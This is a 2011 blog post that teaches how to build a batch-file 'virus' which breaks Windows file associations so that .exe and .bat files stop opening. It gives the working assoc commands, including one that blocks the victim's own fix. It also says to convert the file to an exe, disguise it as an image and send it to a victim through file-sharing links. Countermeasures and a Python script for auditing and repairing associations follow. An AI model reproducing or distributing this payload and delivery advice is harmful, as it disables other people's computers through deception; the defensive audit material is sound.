Friday, September 2, 2011

Virus that disables EXE files.

Every type of file opens with a specific program. For example, video files can be opened with VLC player; in the same way, exe files open with the exefile program. This is called association: we say exe is associated with exefile. Now suppose this association is somehow broken. The effect is severe: the victim can no longer open any exe file (cmd, notepad, paint, etc.).
To see the association of a file type, open the command prompt and type: assoc .<extension> (for example, assoc .exe).

>assoc .bat <hit enter>
>.bat=batfile <result>
i.e. a bat file is associated with batfile.

Creating Process:-
1. Open Notepad, write the program as given in the examples below, and save it with a .bat extension.
2. Convert this bat file to an exe file using a "bat to exe" converter. Click Here to download the tool.
3. Send this file to your victim and make him click it. You can cover this file using an image file; Click Here to learn the hiding trick. Or you can upload this file to any file sharing website like ziddu.com or megaupload.com and give the link to your victim.

Note:- To create batch files follow the above "creating process".

Example virus: break the association:

:: now exe file is associated with "abc", which doesn't exist.
assoc .exe=abc


Don't assume the victim can't fix this problem: he can use a .bat file to fix it. To fix it, create a bat file with the code:

assoc .exe=exefile

In that case, add one more line to your virus program, as below:

:: now exe file is associated with "abc", which doesn't exist.
assoc .exe=abc
:: now bat file is associated with "abc", which doesn't exist.
assoc .bat=abc


Countermeasure:
1. Whenever we change an association, the registry gets edited. So to recover from this attack, the only thing we can do is always keep a backup of the registry.
To create a registry backup, go to Start -> Run and type regedit. The Registry Editor window opens; in it, go to the File menu -> Export and choose a location to save.
2. Edit the registry to correct the file association. If you don't know how to edit it, download the registry settings for important file types. Click Here to download the settings.
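
To check whether associations have been tampered with, the output of the assoc command can be compared against known-good values. The script below is an added example, not part of the original post: it audits captured assoc output and builds the assoc lines that restore the defaults. The .exe and .bat values come from this page; the .cmd and .com values and the sample output are assumptions (stock Windows defaults and constructed data).

```python
# Added example: audit captured `assoc` output against a known-good baseline.
# .exe and .bat values are from the page; .cmd and .com are assumed to be
# the stock Windows defaults.
BASELINE = {".exe": "exefile", ".bat": "batfile",
            ".cmd": "cmdfile", ".com": "comfile"}

def parse_assoc(text):
    """Parse `assoc` output (one `.ext=ProgID` per line) into a dict."""
    table = {}
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith(".") or "=" not in line:
            continue  # skip prompts, blank lines and error text
        ext, progid = line.split("=", 1)
        table[ext.strip().lower()] = progid.strip()
    return table

def audit(text, baseline=BASELINE):
    """Return (ext, found, expected) for every extension that deviates."""
    current = parse_assoc(text)
    findings = []
    for ext, expected in sorted(baseline.items()):
        found = current.get(ext)  # None means the association is missing
        if found is None or found.lower() != expected.lower():
            findings.append((ext, found, expected))
    return findings

def repair_commands(findings):
    """Build the `assoc` lines that restore each deviating extension."""
    return [f"assoc {ext}={expected}" for ext, _, expected in findings]

# Constructed sample: `assoc` output on a machine where .exe and .bat were
# re-pointed to "abc" and the .com entry is missing.
SAMPLE = """\
.avi=VLC.avi
.bat=abc
.cmd=cmdfile
.exe=abc
.txt=txtfile
"""

if __name__ == "__main__":
    results = audit(SAMPLE)
    for ext, found, expected in results:
        print(f"{ext}: found {found!r}, expected {expected!r}")
    print("\n".join(repair_commands(results)))
```

To use it on a real machine, save the output of assoc to a text file and pass its contents to audit() in place of SAMPLE.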



Precaution:
Do not practice these tricks on your own PC; use a virtual machine on your PC to make and run these viruses. One such virtual machine is Sun VirtualBox. Click Here to download.
After installing VirtualBox, install XP or 7 inside it (the installation procedure is the same).
